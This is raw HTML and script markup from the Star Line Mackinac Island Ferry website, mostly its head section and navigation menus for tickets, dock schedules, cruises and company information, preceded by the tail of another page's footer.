href="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.0.3/cookieconsent.min.css" /> <script type="text/frzjs" frz_orig_src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.0.3/cookieconsent.min.js" orig_index="21"></script> <script type="text/frzjs" orig_index="22"> window.addEventListener("load", function(){ if (document.documentElement.lang === 'fr-FR') { var content = { header: 'Des cookies sont utilisés sur le site !', message: 'Nous utilisons des cookies susceptibles de réaliser des statistiques de visites ou de permettre de vous proposer des contenus adaptés à vos besoins.', dismiss: 'Refuser', allow: 'Accepter', deny: 'Décliner', close: '&#x274c;', }; } else { var content = { header: 'Cookies used on the website!', message: 'We are using cookies to analyze our website traffic or to propose you personalized content.', dismiss: 'Decline', allow: 'Allow cookies', deny: 'Decline', close: '&#x274c;', }; } window.cookieconsent.initialise({   "palette": {     "popup": {       "background": "#252e39"     },     "button": {       "background": "#14a7d0"     }   }, "showLink": false, "position": "bottom", "content": content, "type": "opt-in" })}); </script> <script src="/fstrz/defer-fe6923120381e32eebb8656bc6358483.js" defer ></script><script> var avg = uxFirst(3); if (avg !== null) { console.log(avg); } </script> <!-- Start of HubSpot Embed Code --> <script type="text/javascript" id="hs-script-loader" async defer src="//js.hs-scripts.com/3267766.js"></script> <!-- End of HubSpot Embed Code --></body> </html>
0
<!doctype html> <html class="no-js" lang="en"> <head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <title>Mackinac Island Ferry, Mackinaw City, St. Ignace | Starline Official Site</title> <link rel="shortcut icon" href="https://www.mackinacferry.com/wp-content/themes/mackinawferry/assets/favicon.ico"> <link rel="stylesheet" href="https://www.mackinacferry.com/wp-content/themes/mackinawferry/css/app.css?v=1.0.51"> <link href="https://fonts.googleapis.com/css?family=Open+Sans:400,400i,700" rel="stylesheet"> <!-- This site is optimized with the Yoast SEO plugin v7.6.1 - https://yoast.com/wordpress/plugins/seo/ --> <meta name="description" content="Star Line Mackinac Island Ferry, service to Mackinac Island from Mackinaw City and St. Ignace Michigan. Star Line offers free daily parking, group rates and Mackinac Island ferry packages as well as coupons."/> <meta property="og:locale" content="en_US" /> <meta property="og:type" content="website" /> <meta property="og:title" content="Mackinac Island Ferry, Mackinaw City, St. Ignace | Starline Official Site" /> <meta property="og:description" content="Star Line Mackinac Island Ferry, service to Mackinac Island from Mackinaw City and St. Ignace Michigan. Star Line offers free daily parking, group rates and Mackinac Island ferry packages as well as coupons." /> <meta property="og:site_name" content="Star Line Mackinac Island Ferry" /> <meta name="twitter:card" content="summary" /> <meta name="twitter:description" content="Star Line Mackinac Island Ferry, service to Mackinac Island from Mackinaw City and St. Ignace Michigan. Star Line offers free daily parking, group rates and Mackinac Island ferry packages as well as coupons." /> <meta name="twitter:title" content="Mackinac Island Ferry, Mackinaw City, St. Ignace | Starline Official Site" /> <meta name="twitter:site" content="@mackinacferry" /> <meta name="twitter:creator" content="@mackinacferry" /> <script type='application/ld+json'>{"@context":"https:\/\/schema.org","@type":"WebSite","@id":"#website","url":"https:\/\/www.mackinacferry.com\/","name":"Star Line Mackinac Island Ferry","potentialAction":{"@type":"SearchAction","target":"https:\/\/www.mackinacferry.com\/?s={search_term_string}","query-input":"required name=search_term_string"}}</script> <meta name="msvalidate.01" content="400783735400CE624299E528C42AD5ED" /> <meta name="google-site-verification" content="3Br1VvOGbrTg3emYZQXPC9RGIW0haWif7IcjRwYgUsY" /> <!-- / Yoast SEO plugin. --> <link rel='dns-prefetch' href='//www.mackinacferry.com' /> <link rel='dns-prefetch' href='//ajax.googleapis.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="Star Line Mackinac Island Ferry &raquo; Home Page Comments Feed" href="https://www.mackinacferry.com/sample-page/feed/" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/www.mackinacferry.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.8"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='jquery-style-css' href='//ajax.googleapis.com/ajax/libs/jqueryui/1.8.2/themes/smoothness/jquery-ui.css?ver=4.9.8' type='text/css' media='all' /> <script type='text/javascript' src='https://www.mackinacferry.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='https://www.mackinacferry.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <script type='text/javascript' src='https://www.mackinacferry.com/wp-content/themes/mackinawferry/js/modernizr/modernizr.min.js?ver=4.9.8'></script> <link rel='https://api.w.org/' href='https://www.mackinacferry.com/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.mackinacferry.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.mackinacferry.com/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 4.9.8" /> <link rel='shortlink' href='https://www.mackinacferry.com/' /> <link rel="alternate" type="application/json+oembed" href="https://www.mackinacferry.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.mackinacferry.com%2F" /> <link rel="alternate" type="text/xml+oembed" href="https://www.mackinacferry.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.mackinacferry.com%2F&#038;format=xml" /> <style type="text/css" media="screen"> div.printfriendly a, div.printfriendly a:link, div.printfriendly a:hover, div.printfriendly a:visited { text-decoration: none; border: none; } </style> <style type="text/css" media="screen"> div.printfriendly { margin: 12px 12px 12px 12px; position: relative; z-index: 1000; } div.printfriendly a, div.printfriendly a:link, div.printfriendly a:visited { font-size: 14px; color: #6D9F00; vertical-align: bottom; } .printfriendly a { box-shadow:none; } .printfriendly a:hover { cursor: pointer; } .printfriendly a img { border: none; padding:0; margin-right: 6px; box-shadow: none; -webkit-box-shadow: none; -moz-box-shadow: none; } .printfriendly a span{ vertical-align: bottom; } .pf-alignleft { float: left; } .pf-alignright { float: right; } div.pf-aligncenter { display: block; margin-left: auto; margin-right: auto; text-align: center; } </style> <style type="text/css" media="print"> .printfriendly { display: none; } </style> <!-- <meta name="NextGEN" version="3.0.1" /> --> <link rel="canonical" href="https://www.mackinacferry.com/" /> <style type="text/css" id="wp-custom-css"> /* You can add your own CSS here. Click the help icon above to learn more. */ #departures { margin-left:auto; margin-right:auto; width: 66.5%; } .freightpics{ border: none; } .employment{ border-top: 3px solid black; border-left: none; border-right: none; border-bottom: none; } </style> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-42722332-1', 'www.mackinacferry.com'); ga('send', 'pageview'); </script> <script> !function(e,n,t,r){function s(){try{var e;if((e="string"==typeof this.response?JSON.parse(this.response):this.response).url){var t=n.getElementsByTagName("script")[0],r=n.createElement("script");r.async=!0,r.src=e.url,t.parentNode.insertBefore(r,t)}}catch(e){}}var o,i,p,a=[],c=[];e[t]={init:function(){o=arguments;var e={then:function(n){return c.push({type:"t",next:n}),e},catch:function(n){return c.push({type:"c",next:n}),e}};return e},on:function(){a.push(arguments)},render:function(){i=arguments},destroy:function(){p=arguments}},e.__onWebMessengerHostReady__=function(n){if(delete e.__onWebMessengerHostReady__,e[t]=n,o)for(var r=n.init.apply(n,o),s=0;s<c.length;s++){var u=c[s];r="t"===u.type?r.then(u.next):r.catch(u.next)}i&&n.render.apply(n,i),p&&n.destroy.apply(n,p);for(s=0;s<a.length;s++)n.on.apply(n,a[s])};var u=new XMLHttpRequest;u.addEventListener("load",s),u.open("GET","https://cdn.zingle.me/web-chat/loader.json",!0),u.responseType="json",u.send()}(window,document,"Zingle"); </script> <link rel='stylesheet' id='dashicons-css' href='https://www.mackinacferry.com/wp-includes/css/dashicons.min.css' type='text/css' media='all' /> <link rel='stylesheet' id='wp-jquery-ui-dialog-css' href='https://www.mackinacferry.com/wp-includes/css/jquery-ui-dialog.min.css' type='text/css' media='all' /> <link rel='stylesheet' id='glm-members-admin-fullcalendar-css-css' href='https://www.mackinacferry.com/wp-content/plugins/glm-member-db/js/fullcalendar/fullcalendar.min.css?ver=2.10.48' type='text/css' media='all' /> <link rel='stylesheet' id='asmselect-css' href='https://www.mackinacferry.com/wp-content/plugins/glm-member-db/css/jquery.asmselect.css?ver=1.0.4a' type='text/css' media='all' /> <link rel='stylesheet' id='glm-member-db-front-css-css' href='https://www.mackinacferry.com/wp-content/plugins/glm-member-db/css/front.css?ver=2.10.48' type='text/css' media='all' /> <link rel='stylesheet' id='grid-front-css-old-css' href='https://www.mackinacferry.com/wp-content/plugins/glm-member-db/css/glm-grid-old.css?ver=2.10.48' type='text/css' media='all' /> <link rel='stylesheet' id='grid-front-css-css' href='https://www.mackinacferry.com/wp-content/plugins/glm-member-db/css/glm-grid.css?ver=2.10.48' type='text/css' media='all' /> <link rel='stylesheet' id='glma-foundation-css-css' href='https://www.mackinacferry.com/wp-content/plugins/glm-member-db/css/glma-foundation.min.css?ver=2.10.48' type='text/css' media='all' /> </head> <body> <div class="off-canvas-wrap" data-offcanvas> <div class="inner-wrap"> <div id="page-wrapper"> <header class="main sticky opensearchserver.ignore"> <div class="row large-collapse"> <div id="logo-tag" class="small-12 small-text-center medium-text-left medium-12 columns"> <div class="row large-collapse"> <div id="header-info" class="medium-12 columns show-for-large-up"> <div class="row large-collapse"> <div class="header-address-wrapper row medium-10 medium-center columns"> <div class="row large-collapse"> <div class="header-address-container medium-4 columns"> <div class="location_1"> <img src="https://www.mackinacferry.com/wp-content/themes/mackinawferry/assets/map-pin-icon.png"> <span class="address_1_street">ST IGNACE DOCK, 587 N. State St</span> <span class="bullet"> &#8226; </span> <span class="address_1_region">St. Ignace, MI 49781</span> </div> </div> <div class="header-address-container medium-5 columns"> <div class="location_2"> <img src="https://www.mackinacferry.com/wp-content/themes/mackinawferry/assets/map-pin-icon.png"> <span class="address_2_street">MACKINAW CITY DOCK, 801 S. Huron St</span> <span class="bullet"> &#8226; </span> <span class="address_2_region">Mackinaw City, MI 49701</span> </div> </div> <div class="header-phone-container medium-3 columns"> <!-- <div class="right header-cart-container"> <a href="order-tickets-online-6/?x=1&Action=Shop_cart"> <span>Cart</span> <img src="/assets/cart-icon.png"> </a> </div> --> <img src="https://www.mackinacferry.com/wp-content/themes/mackinawferry/assets/phone-icon.png"> <span>800-638-9892</span> </div> </div> </div> </div> </div> </div> <a id="logo" href="https://www.mackinacferry.com"><img alt="Star Line Ferry" src="https://www.mackinacferry.com/wp-content/themes/mackinawferry/assets/Star-Line-starfish-logo.png"></a> <span id="logo-slogan"><h3>Where Your Island Adventure Begins</span> </div> </div> <div class="band show-for-large-up"> <nav class="top-bar small-center text-right show-for-large-up" data-topbar role="navigation"> <section class="top-bar-section"> <script> var scheduleUrl = 'https://www.mackinacferry.com/schedules/'; </script> <ul class="sub-menu dropdown schedules-dropdown"> <div id="schedules"> <script> jQuery(document).ready(function(){ // For the drop down docks schedules var dropdown_dockForm = $("#dockForm"); var dropdown_formDockId = $("#formDockId"); var dropdown_formSchedId = $("#formSchedId"); // Dropdowns // sched-1 var dropdown_dock1Sel = $('#dd-sched-1'); dropdown_dock1Sel.change(function(){ dropdown_formSchedId.val(1); dropdown_formDockId.val(dropdown_dock1Sel.val()); dropdown_dockForm.submit(); }); // sched-2 var dropdown_dock2Sel = $('#dd-sched-2'); dropdown_dock2Sel.change(function(){ dropdown_formSchedId.val(2); dropdown_formDockId.val(dropdown_dock2Sel.val()); dropdown_dockForm.submit(); }); // sched-3 var dropdown_dock3Sel = $('#dd-sched-3'); dropdown_dock3Sel.change(function(){ dropdown_formSchedId.val(3); dropdown_formDockId.val(dropdown_dock3Sel.val()); dropdown_dockForm.submit(); }); // sched-4 var dropdown_dock4Sel = $('#dd-sched-4'); dropdown_dock4Sel.change(function(){ dropdown_formSchedId.val(4); dropdown_formDockId.val(dropdown_dock4Sel.val()); dropdown_dockForm.submit(); }); // sched-5 var dropdown_dock5Sel = $('#dd-sched-5'); dropdown_dock5Sel.change(function(){ dropdown_formSchedId.val(5); dropdown_formDockId.val(dropdown_dock5Sel.val()); dropdown_dockForm.submit(); }); // Map links // sched-1 var dropdown_mapLink1 = $('#dropdown-google-map-link1'); dropdown_mapLink1.click(function(){ window.location = 'https://www.mackinacferry.com/schedules/?mapLink=1'; return false; }); // sched-2 var dropdown_mapLink2 = $('#dropdown-google-map-link2'); dropdown_mapLink2.click(function(){ window.location = 'https://www.mackinacferry.com/schedules/?mapLink=2'; return false; }); // sched-3 var dropdown_mapLink3 = $('#dropdown-google-map-link3'); dropdown_mapLink3.click(function(){ window.location = 'https://www.mackinacferry.com/schedules/?mapLink=3'; return false; }); // sched-4 var dropdown_mapLink4 = $('#dropdown-google-map-link4'); dropdown_mapLink4.click(function(){ window.location = 'https://www.mackinacferry.com/schedules/?mapLink=4'; return false; }); // sched-5 var dropdown_mapLink5 = $('#dropdown-google-map-link5'); dropdown_mapLink5.click(function(){ window.location = 'https://www.mackinacferry.com/schedules/?mapLink=5'; return false; }); }); </script> <div id="schedule_wrapper" class="common_schedule_wrapper"> <form id="dockForm" name="dockForm" action="https://www.mackinacferry.com/schedules/" method="get"> <input type="hidden" id="formDockId" name="dockId"> <input type="hidden" id="formSchedId" name="scheduleId"> <div class="dock-tab dock-mc"> <a href="#" class="google-map-link" data-location="Star Line Mackinac Island Ferry,801 S Huron St,Mackinaw City,MI"> <h2>Mackinaw City-Main Dock #1</h2> <img style="min-width:auto;min-height:auto;background:none !important;" src="https://www.mackinacferry.com/wp-content/themes/mackinawferry/assets/map-pin-icon-red.png"> </a> <select id="dd-sched-3"><option value="">Choose Schedule</option> <option value="105">Apr 29th - Jun 6th</option> <option value="106">Jun 7th - Jun 20th</option> <option value="107">Jun 21st - Aug 25th</option> <option value="108">Aug 26th - Sep 2nd</option> <option value="109">Sep 3rd - Oct 27th</option> <option value="110">Oct 28th - Oct 31st</option></select> <div class="dock_img_wrapper"><img src="https://ticket.mackinacferry.com/assets/maps/nav-MAP-Mackinaw-Dock1.jpg" alt="temp-dock-mack (14K)"></div> </div> <div class="dock-tab dock-main"> <a href="#" class="google-map-link" data-location="587 N State St,Saint Ignace, MI"> <h2>St Ignace - Main Dock #3</h2> <img style="min-width:auto;min-height:auto;background:none !important;" src="https://www.mackinacferry.com/wp-content/themes/mackinawferry/assets/map-pin-icon-red.png"> </a> <select id="dd-sched-1"><option value="">Choose Schedule</option> <option value="9">Apr 29th - Jun 9th</option> <option value="50">Jun 10th - Sep 2nd</option> <option value="51">Sep 3rd - Oct 27th</option> <option value="14">Oct 28th - Oct 31st</option></select> <div class="dock_img_wrapper"><img src="https://ticket.mackinacferry.com/assets/maps/nav-MAP-St-Ignace-Dock1.jpg" alt="temp-dock-mack (14K)"></div> </div> <div class="dock-tab dock-rail"> <a href="#" class="google-map-link" data-location="Star Line Mackinac Island Ferry,227 S State St, Saint Ignace, MI"> <h2>St. Ignace-Rail Road Dock #1</h2> <img style="min-width:auto;min-height:auto;background:none !important;" src="https://www.mackinacferry.com/wp-content/themes/mackinawferry/assets/map-pin-icon-red.png"> </a> <select id="dd-sched-2"><option value="">Choose Schedule</option> <option value="24">Jun 21st - Aug 25th</option> <option value="103">Aug 31st - Sep 1st</option></select> <div class="dock_img_wrapper"><img src="https://ticket.mackinacferry.com/assets/maps/nav-MAP-St-Ignace-Dock3.jpg" alt="temp-dock-mack (14K)"></div> </div> <div class="clearer"></div><div class="clearer"></div> </form> </div> </div> </ul> <ul id="menu-main" class=""><li id="menu-item-515" class="tickets-menu menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children has-dropdown drop-left parent menu-item-515"><a href="https://tickets.mackinacferry.com/webstore/landingpage?cg=ferrytickets&#038;c=TICKETS">Tickets</a> <ul class="sub-menu dropdown"> <style> #menu-main #menu-item-848:before { display: inline-block; width: 200px; height: 100px; content: ' '; background-image: url('https://www.mackinacferry.com/wp-content/themes/mackinawferry/assets/is43-1401554613-28521.jpg'); background-size: cover; </style> <li id="menu-item-848" class="menu-item menu-item-type-custom menu-item-object-custom drop-left parent menu-item-848"><a href="https://tickets.mackinacferry.com/webstore/shop/viewItems.aspx?cg=ferrytickets&#038;c=TICKETS">Hydro-Jet Ferrry Tickets to Mackinac Island</a></li> <style> #menu-main #menu-item-489:before { display: inline-block; width: 200px; height: 100px; content: ' '; background-image: url('https://www.mackinacferry.com/wp-content/uploads/2017/03/is34-1485797081-68133-200x100.jpeg'); background-size: cover; </style> <li id="menu-item-489" class="menu-item menu-item-type-post_type menu-item-object-page drop-left parent menu-item-489"><a href="https://www.mackinacferry.com/order-tickets-online/mack-pass-package/">mackPASS Discount Packages</a></li> <style> #menu-main #menu-item-603:before { display: inline-block; width: 200px; height: 100px; content: ' '; background-image: url('https://www.mackinacferry.com/wp-content/themes/mackinawferry/assets/family%20specials%20for%20nav.jpg'); background-size: cover; background-position: center bottom; </style> <li id="menu-item-603" class="family-specials menu-item menu-item-type-custom menu-item-object-custom drop-left parent menu-item-603"><a href="https://tickets.mackinacferry.com/webstore/shop/viewItems.aspx?cg=ferrytickets&#038;c=FAMILYSPECIALS">Family Specials</a></li> <style> #menu-main #menu-item-514:before { display: inline-block; width: 200px; height: 100px; content: ' '; background-image: url('https://www.mackinacferry.com/wp-content/themes/mackinawferry/assets/Multiple%20trips.jpg'); background-size: cover; background-position: center bottom; </style> <li id="menu-item-514" class="multiple-trips menu-item menu-item-type-custom menu-item-object-custom drop-left parent menu-item-514"><a href="https://tickets.mackinacferry.com/webstore/shop/viewItems.aspx?cg=ferrytickets&#038;c=MULTIPLEDAY">Multiple Day Tickets</a></li> <style> #menu-main #menu-item-1270:before { display: inline-block; width: 200px; height: 100px; content: ' '; background-image: url('https://www.mackinacferry.com/wp-content/themes/mackinawferry/assets/classic-ferry.jpg'); background-size: cover; background-position: center bottom; </style> <li id="menu-item-1270" class="classic-ferry menu-item menu-item-type-custom menu-item-object-custom drop-left parent menu-item-1270"><a href="https://tickets.mackinacferry.com/webstore/shop/viewItems.aspx?cg=ferrytickets&#038;c=CLASSIC">Classic Ferry Economy Tickets</a></li> <style> #menu-main #menu-item-851:before { display: inline-block; width: 200px; height: 100px; content: ' '; background-image: url('https://www.mackinacferry.com/wp-content/themes/mackinawferry/assets/All-Tickets-to-Mackinac-Island-Option-Featured-Image-400x200.png'); background-size: cover; background-position: center bottom; </style> <li id="menu-item-851" class="all-ticket-options menu-item menu-item-type-custom menu-item-object-custom drop-left parent menu-item-851"><a href="https://tickets.mackinacferry.com/webstore/landingPage">All Ticket Options</a></li> </ul> </li> <li id="menu-item-1153" class="menu-item menu-item-type-post_type menu-item-object-page drop-left parent menu-item-1153"><a href="https://www.mackinacferry.com/schedules/">Schedules</a></li> <li id="menu-item-377" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children has-dropdown drop-left parent menu-item-377"><a href="https://www.mackinacferry.com/groups-and-cruises/">Groups &#038; Events</a> <ul class="sub-menu dropdown"> <style> #menu-main #menu-item-392:before { display: inline-block; width: 200px; height: 100px; content: ' '; background-image: url('https://www.mackinacferry.com/wp-content/uploads/2017/03/is34-1376678239-99134-200x100.jpeg'); background-size: cover; </style> <li id="menu-item-392" class="menu-item menu-item-type-post_type menu-item-object-page drop-left parent menu-item-392"><a href="https://www.mackinacferry.com/groups-and-cruises/fireworks-cruise/">Fireworks Cruise</a></li> <style> #menu-main #menu-item-391:before { display: inline-block; width: 200px; height: 100px; content: ' '; background-image: url('https://www.mackinacferry.com/wp-content/uploads/2017/03/IMG_7401-e1490204221796-200x100.jpg'); background-size: cover; </style> <li id="menu-item-391" class="menu-item menu-item-type-post_type menu-item-object-page drop-left parent menu-item-391"><a href="https://www.mackinacferry.com/groups-and-cruises/sunset-cruise/">Sunset Cruises</a></li> <style> #menu-main #menu-item-1293:before { display: inline-block; width: 200px; height: 100px; content: ' '; background-image: url('https://www.mackinacferry.com/wp-content/themes/mackinawferry/assets/is43-1401554613-28521.jpg'); background-size: cover; </style> <li id="menu-item-1293" class="menu-item menu-item-type-custom menu-item-object-custom drop-left parent menu-item-1293"><a href="https://tickets.mackinacferry.com/webstore/shop/viewItems.aspx?cg=MACKINAC&#038;c=Bridgewalkboats">Labor Day Bridge Walk Boat Departures!</a></li> <style> #menu-main #menu-item-235:before { display: inline-block; width: 200px; height: 100px; content: ' '; background-image: url('https://www.mackinacferry.com/wp-content/uploads/2017/03/is61-1376678240-30239-200x100.jpeg'); background-size: cover; </style> <li id="menu-item-235" class="menu-item menu-item-type-post_type menu-item-object-page drop-left parent menu-item-235"><a href="https://www.mackinacferry.com/groups-and-cruises/weddings/">Weddings</a></li> <style> #menu-main #menu-item-236:before { display: inline-block; width: 200px; height: 100px; content: ' '; background-image: url('https://www.mackinacferry.com/wp-content/uploads/2017/03/is51-1401556476-65361-200x100.png'); background-size: cover; </style> <li id="menu-item-236" class="menu-item menu-item-type-post_type menu-item-object-page drop-left parent menu-item-236"><a href="https://www.mackinacferry.com/groups-and-cruises/private-party-boat-anna-may/">Custom Party Boat Cruises</a></li> <style> #menu-main #menu-item-234:before { display: inline-block; width: 200px; height: 100px; content: ' '; background-image: url('https://www.mackinacferry.com/wp-content/uploads/2017/03/11164660_10153032004958772_6390406304387544439_o-200x100.jpg'); background-size: cover; </style> <li id="menu-item-234" class="menu-item menu-item-type-post_type menu-item-object-page drop-left parent menu-item-234"><a href="https://www.mackinacferry.com/groups-and-cruises/2019-group-packages/">2019 Adult Group Packages</a></li> <style> #menu-main #menu-item-473:before { display: inline-block; width: 200px; height: 100px; content: ' '; background-image: url('https://www.mackinacferry.com/wp-content/uploads/2017/03/is55-1406854194-87727-200x100.jpeg'); background-size: cover; </style> <li id="menu-item-473" class="menu-item menu-item-type-post_type menu-item-object-page drop-left parent menu-item-473"><a href="https://www.mackinacferry.com/groups-and-cruises/fourth-of-july-fireworks-cruise/">Fourth of July Fireworks Cruise</a></li> <style> #menu-main #menu-item-1464:before { display: inline-block; width: 200px; height: 100px; content: ' '; background-image: url('https://www.mackinacferry.com/wp-content/themes/mackinawferry/assets/chicago-yacht-race.jpg'); background-size: cover; </style> <li id="menu-item-1464" class="menu-item menu-item-type-post_type menu-item-object-page drop-left parent menu-item-1464"><a href="https://www.mackinacferry.com/groups-and-cruises/chicagoyachtclubracetomackinac/">Chicago Yacht Club Race to Mackinac</a></li> <style> #menu-main #menu-item-1465:before { display: inline-block; width: 200px; height: 100px; content: ' '; background-image: url('https://www.mackinacferry.com/wp-content/themes/mackinawferry/assets/run-mackinac.jpg'); background-size: cover; </style> <li id="menu-item-1465" class="menu-item menu-item-type-post_type menu-item-object-page drop-left parent menu-item-1465"><a href="https://www.mackinacferry.com/groups-and-cruises/runmackinac/">Run Mackinac</a></li> </ul> </li> <li id="menu-item-1488" class="menu-item menu-item-type-post_type menu-item-object-page drop-left parent menu-item-1488"><a href="https://www.mackinacferry.com/about-us/freight-2/">Freight</a></li> <li id="menu-item-239" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children has-dropdown drop-left parent menu-item-239"><a href="https://www.mackinacferry.com/about-us/">About</a> <ul class="sub-menu dropdown"> <style> #menu-main #menu-item-292:before { display: inline-block; width: 200px; height: 100px; content: ' '; background-image: url('https://www.mackinacferry.com/wp-content/uploads/2017/03/Mike-Fornes-shares-the-history-of-the-Mackinac-Bridge-with-the-passengers-of-the-STAR-LINE-sunset-cruise-200x100.jpg'); background-size: cover; </style> <li id="menu-item-292" class="menu-item menu-item-type-post_type menu-item-object-page drop-left parent menu-item-292"><a href="https://www.mackinacferry.com/about-us/faq/">FAQ About Traveling to Mackinac Island</a></li> <style> #menu-main #menu-item-299:before { display: inline-block; width: 200px; height: 100px; content: ' '; background-image: url('https://www.mackinacferry.com/wp-content/uploads/2017/03/is84-1485802001-96133-e1489696483320-200x100.jpeg'); background-size: cover; </style> <li id="menu-item-299" class="menu-item menu-item-type-post_type menu-item-object-page drop-left parent menu-item-299"><a href="https://www.mackinacferry.com/about-us/area-info/">Mackinac Island and Straits of Mackinac Area Info</a></li> <style> #menu-main #menu-item-390:before { display: inline-block; width: 200px; height: 100px; content: ' '; background-image: url('https://www.mackinacferry.com/wp-content/uploads/2017/03/is67-1454257314-90055-200x100.png'); background-size: cover; </style> <li id="menu-item-390" class="menu-item menu-item-type-post_type menu-item-object-page drop-left parent menu-item-390"><a href="https://www.mackinacferry.com/about-us/employment-2/">Employment</a></li> <style> #menu-main #menu-item-389:before { display: inline-block; width: 200px; height: 100px; content: ' '; background-image: url('https://www.mackinacferry.com/wp-content/uploads/2017/03/is41-1486135178-08707-200x100.jpeg'); background-size: cover; </style> <li id="menu-item-389" class="menu-item menu-item-type-post_type menu-item-object-page drop-left parent menu-item-389"><a href="https://www.mackinacferry.com/about-us/freight-2/">Getting Freight to Mackinac Island</a></li> <style> #menu-main #menu-item-1310:before { display: inline-block; width: 200px; height: 100px; content: ' '; background-image: url('https://www.mackinacferry.com/wp-content/themes/mackinawferry/assets/is43-1401554613-28521.jpg'); background-size: cover; </style> <li id="menu-item-1310" class="menu-item menu-item-type-post_type menu-item-object-page drop-left parent menu-item-1310"><a href="https://www.mackinacferry.com/about-us/millslip/">Boat Storage</a></li> <style> #menu-main #menu-item-293:before { display: inline-block; width: 200px; height: 100px; content: ' '; background-image: url('https://www.mackinacferry.com/wp-content/uploads/2017/03/iPhone-Pics-060-200x100.jpg'); background-size: cover; </style> <li id="menu-item-293" class="menu-item menu-item-type-post_type menu-item-object-page drop-left parent menu-item-293"><a href="https://www.mackinacferry.com/about-us/security-notice/">Security Notice</a></li> <style> #menu-main #menu-item-297:before { display: inline-block; width: 200px; height: 100px; content: ' '; background-image: url('https://www.mackinacferry.com/wp-content/uploads/2017/03/IMG_7459-200x100.jpg'); background-size: cover; </style> <li id="menu-item-297" class="menu-item menu-item-type-post_type menu-item-object-page drop-left parent menu-item-297"><a href="https://www.mackinacferry.com/about-us/videos/">Fun Videos of Star Line and Mackinac Island</a></li> </ul> </li> </ul> </section> </nav> </div> <nav class="tab-bar show-for-medium-down"> <section class="left-small"> <a class="left-off-canvas-toggle menu-icon" href="#"><span>Menu</span></a> </section> <section class="center-small"> <a class="" href="https://tickets.mackinacferry.com/webstore/landingpage?cg=ferrytickets&c=TICKETS"><span>Buy Tickets</span></a> </section> <section class="right-small"> <!-- <div class="header-cart-container"> <a href="order-tickets-online-6/?x=1&Action=Shop_cart"> <span>Cart</span> <img src="/assets/cart-icon-white.png"> </a> </div> --> </section> </nav> </header> <aside class="left-off-canvas-menu hide-for-large-up opensearchserver.ignore"> <h4 class="oc-schedules-header">Schedules</h4> <script> function get_schedule( scheduleId ) { $.get( 'https://www.mackinacferry.com/wp-admin/admin-ajax.php?action=glm_members_admin_ajax&glm_action=schedule&schedule_id=' + scheduleId ).done( function(data){ $('#edit-divy').html(data); } ); } jQuery(document).ready(function(){ // For the drop down docks schedules var offcanvas_dockForm = $("#oc_dockForm"); var offcanvas_formDockId = $("#oc_formDockId"); var offcanvas_formSchedId = $("#oc_formSchedId"); var offcanvas_dock1Sel = $('#oc-sched-1'); offcanvas_dock1Sel.change(function(){ offcanvas_formSchedId.val(1); offcanvas_formDockId.val(offcanvas_dock1Sel.val()); offcanvas_dockForm.submit(); }); var offcanvas_dock2Sel = $('#oc-sched-2'); 